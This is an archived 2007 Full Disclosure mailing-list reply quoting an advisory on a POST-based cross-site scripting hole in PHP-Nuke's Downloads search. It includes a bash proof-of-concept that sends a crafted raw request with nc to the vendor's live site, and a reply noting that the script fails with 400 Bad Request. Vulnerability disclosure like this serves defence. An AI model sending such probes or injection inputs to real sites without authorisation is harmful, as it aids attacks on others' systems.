Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Php Nuke POST XSS on steroids
From: Paul Laudanski <paul () castlecops com>
Date: Sun, 11 Mar 2007 16:02:38 -0400



ascii wrote:
Php Nuke POST XSS on steroids

 Name              Php Nuke POST XSS on steroids
 Systems Affected  PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and
                   others (partially verified)
 Severity          Medium
 Vendor            http://php nuke.org/
 Advisory          http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/
 Authors           Francesco `ascii` Ongaro (ascii () ush it)
                   Stefano `wisec` di Paola (stefano.dipaola () wisec it)
 Date              20070307
--- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8

#!/bin/bash

cat > REQ << TOKEN
POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1
Host: www.phpnuke.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2)
Gecko/20070220 Firefox/2.0.0.2
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.phpnuke.org/modules.php?name=Downloads
Cookie: lang=english
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

query=token<>token

TOKEN

cat REQ | nc www.phpnuke.org 80 -vvv

--- >8 --- >8 --- >8 --- >8 --- ------------ --- >8 --- >8 --- >8 --- >8

$ ./testcase | grep "token<>token"
DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net
www.phpnuke.org [67.15.16.43] 80 (http) open
<form
action="modules.php?name=Downloads&amp;d_op=search&amp;query=token<>toke

Regards,
Francesco `ascii` Ongaro
http://www.ush.it/

  
I tried both your scripts at a few locations, and all I get back is this:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
Gecko/20070220 Firefox/2.0.0.2</pre>
</p>
</body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]